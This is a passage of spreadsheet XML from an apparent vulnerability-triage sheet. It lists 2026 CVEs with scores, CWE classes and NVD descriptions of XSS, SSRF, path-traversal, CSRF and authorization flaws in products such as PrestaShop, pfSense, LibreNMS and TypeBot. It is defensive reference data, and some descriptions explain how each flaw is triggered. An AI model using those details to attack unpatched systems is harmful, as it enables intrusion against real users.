    <row r="4852">
      <c r="A4852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30368</t>
        </is>
      </c>
      <c r="C4852" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4852" s="5" t="inlineStr"/>
      <c r="F4852" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4852" s="5" t="inlineStr"/>
      <c r="H4852" s="5" t="inlineStr"/>
      <c r="I4852" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J4852" s="5" t="inlineStr"/>
      <c r="K4852" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4852" s="5" t="inlineStr">
        <is>
          <t>A client-side authorization flaw in Lightspeed Systems Classroom v5.1.2.1763770643 allows unauthenticated attackers to impersonate users by bypassing integrity checks and abusing client-generated authorization tokens, leading to unauthorized control and monitoring of student devices.</t>
        </is>
      </c>
      <c r="M4852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30368</t>
        </is>
      </c>
    </row>
    <row r="4853">
      <c r="A4853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38725</t>
        </is>
      </c>
      <c r="C4853" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4853" s="5" t="inlineStr"/>
      <c r="F4853" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4853" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4853" s="5" t="inlineStr"/>
      <c r="I4853" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4853" s="5" t="inlineStr"/>
      <c r="K4853" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4853" s="5" t="inlineStr">
        <is>
          <t>xipblog module v2.0.1 and before for PrestaShop allows unauthenticated remote attackers to inject arbitrary JavaScript via the name and content parameters in ajax.php. The input is stored in the database without HTML sanitization and rendered in Smarty templates without output escaping, resulting in Stored Cross-Site Scripting (XSS). When an administrator reviews comments in the back office, the payload executes with admin-level session context, leading to full store compromise.</t>
        </is>
      </c>
      <c r="M4853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38725</t>
        </is>
      </c>
    </row>
    <row r="4854">
      <c r="A4854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38961</t>
        </is>
      </c>
      <c r="C4854" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4854" s="5" t="inlineStr"/>
      <c r="F4854" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4854" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4854" s="5" t="inlineStr"/>
      <c r="I4854" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4854" s="5" t="inlineStr"/>
      <c r="K4854" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4854" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the RSS Widget of Netgate pfSense Plus (versions 26.03, 25.11.1) and pfSense CE (version 2.8.1) allows remote authenticated attackers to inject arbitrary JavaScript via malicious content in an RSS feed title. The injected script executes in the browser of any authenticated user who views the dashboard, due to insufficient sanitization of feed title data before rendering in the widget.</t>
        </is>
      </c>
      <c r="M4854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38961</t>
        </is>
      </c>
    </row>
    <row r="4855">
      <c r="A4855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40635</t>
        </is>
      </c>
      <c r="C4855" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4855" s="5" t="inlineStr"/>
      <c r="F4855" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4855" s="5" t="inlineStr"/>
      <c r="H4855" s="5" t="inlineStr"/>
      <c r="I4855" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4855" s="5" t="inlineStr"/>
      <c r="K4855" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L4855" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS versions 9.12.0.0 through 9.13.1.0 contain an Insecure Temporary File vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to denial of service and information tampering.</t>
        </is>
      </c>
      <c r="M4855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40635</t>
        </is>
      </c>
    </row>
    <row r="4856">
      <c r="A4856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45086</t>
        </is>
      </c>
      <c r="C4856" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4856" s="5" t="inlineStr"/>
      <c r="F4856" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4856" s="5" t="inlineStr"/>
      <c r="H4856" s="5" t="inlineStr"/>
      <c r="I4856" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4856" s="5" t="inlineStr"/>
      <c r="K4856" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4856" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. From 0.31.1 before 0.31.5 and in 0.32.0.rc1 before 0.32.0.rc2, a participant can directly load /admin/demographics/questions/edit_questions and reach the demographics questionnaire editor without the required administrator authorization. The demographics questionnaire editor should require admin access, but the route under /admin/demographics/questions renders the editor interface without checking whether the caller is an admin. A normal participant can load the page and see the live update form action, which proves the protected interface is reachable. This issue is fixed in versions 0.31.5 and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M4856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45086</t>
        </is>
      </c>
    </row>
    <row r="4857">
      <c r="A4857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45120</t>
        </is>
      </c>
      <c r="C4857" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4857" s="5" t="inlineStr"/>
      <c r="F4857" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4857" s="5" t="inlineStr"/>
      <c r="H4857" s="5" t="inlineStr"/>
      <c r="I4857" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4857" s="5" t="inlineStr"/>
      <c r="K4857" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4857" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the calendar module does not verify private event status consistently, allowing users with viewing and moderation permissions to access and moderate private events. The private-event check used by get_events() in inc/functions_calendar.php and the event action is missing from the remaining calendar.php actions, despite the limited-access behavior described in inc/languages/english/calendar.lang.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M4857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45120</t>
        </is>
      </c>
    </row>
    <row r="4858">
      <c r="A4858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45694</t>
        </is>
      </c>
      <c r="C4858" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4858" s="5" t="inlineStr"/>
      <c r="F4858" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4858" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4858" s="5" t="inlineStr"/>
      <c r="I4858" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4858" s="5" t="inlineStr"/>
      <c r="K4858" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4858" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions up to and including 26.4.0, the Proxmox application view is vulnerable to reflected cross-site scripting through the user-supplied instance and vmid GET parameters, which are reflected into the page title without adequate encoding. The parameters are placed into the page title with only strip_tags applied, and the title is then written into an inline document.title assignment through string interpolation, so a single quote terminates the JavaScript string and the remaining input runs as script. An attacker who lures an authenticated user into following a crafted link can execute script in that user's session, enabling actions such as theft of session data. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="M4858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45694</t>
        </is>
      </c>
    </row>
    <row r="4859">
      <c r="A4859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46358</t>
        </is>
      </c>
      <c r="C4859" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4859" s="5" t="inlineStr"/>
      <c r="F4859" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4859" s="5" t="inlineStr"/>
      <c r="H4859" s="5" t="inlineStr"/>
      <c r="I4859" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4859" s="5" t="inlineStr"/>
      <c r="K4859" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4859" s="5" t="inlineStr">
        <is>
          <t>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.4, OpenBao's inline auth functionality incorrectly redacted audit log entries, resulting in non-auth headers being removed and auth-related headers being retained in cleartext. This requires an attacker to compromise access to the audit device. Operators should review leaked source authentication material and rotate it as appropriate. This is fixed in OpenBao v2.5.4.</t>
        </is>
      </c>
      <c r="M4859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46358</t>
        </is>
      </c>
    </row>
    <row r="4860">
      <c r="A4860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47229</t>
        </is>
      </c>
      <c r="C4860" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4860" s="5" t="inlineStr"/>
      <c r="F4860" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4860" s="5" t="inlineStr"/>
      <c r="H4860" s="5" t="inlineStr"/>
      <c r="I4860" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4860" s="5" t="inlineStr"/>
      <c r="K4860" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4860" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, `modules/sso/clients.php` validates an `adm_csrf_token` on every state-changing branch except `enable`. The `enable` case loads the SAML or OIDC client by UUID, calls `$client-&gt;enable($enabled)`, and persists the new state with no token check. Because the action is reachable via plain GET parameters, a third-party page can trick an authenticated administrator into disabling (or silently re-enabling) any configured SAML or OIDC client. Disabling an SSO client breaks every downstream relying-party application that authenticates through it. Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M4860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47229</t>
        </is>
      </c>
    </row>
    <row r="4861">
      <c r="A4861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47880</t>
        </is>
      </c>
      <c r="C4861" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4861" s="5" t="inlineStr"/>
      <c r="F4861" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4861" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H4861" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_integration</t>
        </is>
      </c>
      <c r="I4861" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J4861" s="5" t="inlineStr"/>
      <c r="K4861" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4861" s="5" t="inlineStr">
        <is>
          <t>A producer who can publish to a JMS destination consumed by any Spring Integration JMS inbound component can set String JMS properties named replyChannel, errorChannel, or json__TypeId__ which are copied verbatim into the Spring Integration MessageHeaders.
Spring Integration 7.1.0
Spring Integration 7.0.0 - 7.0.5
Spring Integration 6.5.0 - 6.5.10
Spring Integration 6.4.0 - 6.4.12
Spring Integration 5.5.21 and earlier</t>
        </is>
      </c>
      <c r="M4861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47880</t>
        </is>
      </c>
    </row>
    <row r="4862">
      <c r="A4862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48483</t>
        </is>
      </c>
      <c r="C4862" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4862" s="5" t="inlineStr"/>
      <c r="F4862" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4862" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4862" s="5" t="inlineStr"/>
      <c r="I4862" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4862" s="5" t="inlineStr"/>
      <c r="K4862" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4862" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, Typebot's WhatsApp status forwarding feature stores a workspace-configured webhook forwarding URL and later POSTs WhatsApp marketing/error status events to it from the server. The stored URL is only validated as a generic URL in settings, but the forwarding code uses the raw `ky` instance instead of the repository's SSRF-protected `safeKy` client. A workspace user who can configure WhatsApp settings can therefore make the Typebot server issue HTTP requests to internal services, private-network hosts, localhost, or metadata-style endpoints whenever the public WhatsApp production webhook receives a status payload that should be forwarded. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M4862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48483</t>
        </is>
      </c>
    </row>
    <row r="4863">
      <c r="A4863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48762</t>
        </is>
      </c>
      <c r="C4863" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4863" s="5" t="inlineStr"/>
      <c r="F4863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4863" s="5" t="inlineStr"/>
      <c r="H4863" s="5" t="inlineStr"/>
      <c r="I4863" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4863" s="5" t="inlineStr"/>
      <c r="K4863" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4863" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.16.0, the OpenAI "Create Transcription" action handler fetches a user-supplied audio URL using `fetch()` without applying the SSRF protection that exists elsewhere in the codebase. An attacker can direct the server to make HTTP requests to arbitrary internal addresses and localhost. The fetched content is passed to the OpenAI Whisper API and the transcription result is returned to the attacker. Version 3.16.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M4863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48762</t>
        </is>
      </c>
    </row>
    <row r="4864">
      <c r="A4864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53956</t>
        </is>
      </c>
      <c r="C4864" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4864" s="5" t="inlineStr"/>
      <c r="F4864" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4864" s="5" t="inlineStr"/>
      <c r="H4864" s="5" t="inlineStr"/>
      <c r="I4864" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4864" s="5" t="inlineStr"/>
      <c r="K4864" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L4864" s="5" t="inlineStr">
        <is>
          <t>Rattler is a library that provides common functionality used within the conda ecosystem. `rattler_cache` prior to version 0.9.0 and `py-rattler` prior to version 0.24.0 were vulnerable to package-cache path traversal when handling package metadata from conda channels. During cache materialization, the `ratter_cache` code used the package record `build` string as part of a cache key that was joined into a filesystem path. A malicious or untrusted channel could publish repodata with path separators or traversal components in that field, causing package contents to be written outside the configured package cache directory. The issue requires use of a malicious or otherwise untrusted conda channel. Curated channels that validate package metadata are not expected to allow malformed build strings of this form. Users should upgrade to `rattler_cache` version 0.9.0 or `py-rattler` version 0.24.0 and avoid untrusted conda channels.</t>
        </is>
      </c>
      <c r="M4864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53956</t>
        </is>
      </c>
    </row>
    <row r="4865">
      <c r="A4865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54256</t>
        </is>
      </c>
      <c r="C4865" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4865" s="5" t="inlineStr"/>
      <c r="F4865" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4865" s="5" t="inlineStr"/>
      <c r="H4865" s="5" t="inlineStr"/>
      <c r="I4865" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4865" s="5" t="inlineStr"/>
      <c r="K4865" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-639</t>
        </is>
      </c>
      <c r="L4865" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the backend FileUpload form widget trusted an attacker-controlled file_id POST parameter when resolving the attachment it operates on, allowing an authenticated backend user to read and modify attachment records belonging to other users or records. The widget's getFileRecord() lookup resolved the posted id against the global system_files table without verifying that the file belonged to the widget's own relation, parent record, or deferred-binding session. Because all attachments share a single File model and table and attachment ids are sequential integers that are easily enumerated, a user reaching any form with a fileupload field, including the built-in My Account avatar field that requires no specific permission, could target arbitrary attachments to modify their title and description via onSaveAttachmentConfig and change their sort order via onSortAttachments, which passed posted ids straight to an unscoped update. CSRF tokens remain enforced, so exploitation requires a valid authenticated backend session with any level of access. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M4865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54256</t>
        </is>
      </c>
    </row>
    <row r="4866">
      <c r="A4866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54336</t>
        </is>
      </c>
      <c r="C4866" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4866" s="5" t="inlineStr"/>
      <c r="F4866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4866" s="5" t="inlineStr"/>
      <c r="H4866" s="5" t="inlineStr"/>
      <c r="I4866" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4866" s="5" t="inlineStr"/>
      <c r="K4866" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4866" s="5" t="inlineStr">
        <is>
          <t>JumpServer is an open source bastion host and an operation and maintenance security audit system. From 4.8.0 until 4.10.17, an authenticated user with SFTP permission to an authorized asset can submit crafted traversal paths through the KoKo Web Terminal SFTP feature, causing AssetDir.GetRealPath() in pkg/srvconn/sftp_asset.go to resolve paths outside the intended SFTP root and permit read, list, write, rename, or delete operations under the configured backend account on that asset. This issue is fixed in version 4.10.17.</t>
        </is>
      </c>
      <c r="M4866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54336</t>
        </is>
      </c>
    </row>
    <row r="4867">
      <c r="A4867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54543</t>
        </is>
      </c>
      <c r="C4867" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4867" s="5" t="inlineStr"/>
      <c r="F4867" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4867" s="5" t="inlineStr"/>
      <c r="H4867" s="5" t="inlineStr"/>
      <c r="I4867" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4867" s="5" t="inlineStr"/>
      <c r="K4867" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L4867" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, the DomainZones.add API command in lib/Froxlor/Api/Commands/DomainZones.php accepts user-controlled record and type values without rejecting line delimiters, tab characters, semicolons, or unsupported DNS record types before lib/Froxlor/Dns/DnsEntry.php serializes the values into a BIND zone file. An authenticated customer with DNS-zone permissions can place a crafted value in the record field, or use the related type-field variant, to create additional resource-record lines that bypass Froxlor's field-level validation. BIND accepts the injected records, allowing modification of DNS data and possible DNS availability impact within a zone the caller is authorized to manage. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M4867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54543</t>
        </is>
      </c>
    </row>
    <row r="4868">
      <c r="A4868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54553</t>
        </is>
      </c>
      <c r="C4868" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4868" s="5" t="inlineStr"/>
      <c r="F4868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4868" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4868" s="5" t="inlineStr"/>
      <c r="I4868" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4868" s="5" t="inlineStr"/>
      <c r="K4868" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-248, CWE-639</t>
        </is>
      </c>
      <c r="L4868" s="5" t="inlineStr">
        <is>
          <t>Starlette-Admin is a fast, beautiful and extensible administrative interface framework for FastAPI and Starlette applications. Prior to 0.16.1, the list API does not validate user-supplied order_by and structured where field names against the configured sortable_fields and searchable_fields allowlists. An authenticated user with access to an affected list endpoint can submit arbitrary field names to starlette_admin/base.py and the BaseModelView validation path, bypassing restrictions presented by the administrative user interface. Requests can sort or filter on fields that are not intended to be sortable or searchable, causing limited information exposure. Invalid field names and special Python attribute names such as metadata and the class dunder attribute can also trigger unhandled exceptions and HTTP 500 responses, causing limited denial of service for targeted requests. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="M4868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54553</t>
        </is>
      </c>
    </row>
    <row r="4869">
      <c r="A4869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54707</t>
        </is>
      </c>
      <c r="C4869" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4869" s="5" t="inlineStr"/>
      <c r="F4869" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4869" s="5" t="inlineStr"/>
      <c r="H4869" s="5" t="inlineStr"/>
      <c r="I4869" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4869" s="5" t="inlineStr"/>
      <c r="K4869" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4869" s="5" t="inlineStr">
        <is>
          <t>OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. Prior to 2.6.4, OnionShare CLI/Desktop does not enforce the Receive mode disable_files setting in cli/onionshare_cli/web/receive_mode.py, where ReceiveModeRequest._get_file_stream() writes multipart file[] data to disk despite the text-only setting. This issue is fixed in version 2.6.4.</t>
        </is>
      </c>
      <c r="M4869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54707</t>
        </is>
      </c>
    </row>
    <row r="4870">
      <c r="A4870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54717</t>
        </is>
      </c>
      <c r="C4870" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4870" s="5" t="inlineStr"/>
      <c r="F4870" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4870" s="5" t="inlineStr"/>
      <c r="H4870" s="5" t="inlineStr"/>
      <c r="I4870" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4870" s="5" t="inlineStr"/>
      <c r="K4870" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4870" s="5" t="inlineStr">
        <is>
          <t>Silverstripe CMS is an open source content management system. Prior to 6.2.1, page breadcrumbs in the CMS are vulnerable to cross-site scripting when viewed using the page list view, because page titles are rendered into the breadcrumb trail without being escaped. This issue is fixed in 6.2.1.</t>
        </is>
      </c>
      <c r="M4870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54717</t>
        </is>
      </c>
    </row>
    <row r="4871">
      <c r="A4871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55513</t>
        </is>
      </c>
      <c r="C4871" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4871" s="5" t="inlineStr"/>
      <c r="F4871" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4871" s="5" t="inlineStr"/>
      <c r="H4871" s="5" t="inlineStr"/>
      <c r="I4871" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4871" s="5" t="inlineStr"/>
      <c r="K4871" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L4871" s="5" t="inlineStr">
        <is>
